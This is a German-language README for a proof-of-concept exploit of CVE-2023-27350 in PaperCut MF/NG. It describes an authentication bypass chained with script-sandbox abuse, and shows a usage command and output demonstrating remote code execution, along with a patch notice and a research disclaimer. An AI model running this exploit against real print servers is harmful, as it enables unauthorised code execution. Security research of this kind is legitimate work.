
Papercut Sicherheitslücke, Betroffene Versionen sind PaperCut MF oder NG Version 8.0 oder später (ausgenommen gepatchte Versionen) auf allen Betriebssystemplattformen.
POC für CVE-2023-27350, der PaperCut MF/NG betrifft
##Betroffene Versionen 'PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms.'
Dieser POC nutzt eine Authentifizierungsumgehungsschwachstelle, die mit dem Missbrauch der integrierten Skriptfunktionalität verkettet ist, um Code auszuführen.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Aktualisieren Sie auf die neueste Version oder führen Sie die Gegenmaßnahmen gemäß den Anweisungen im PaperCut-Sicherheitshinweis durch
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt. Sie ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.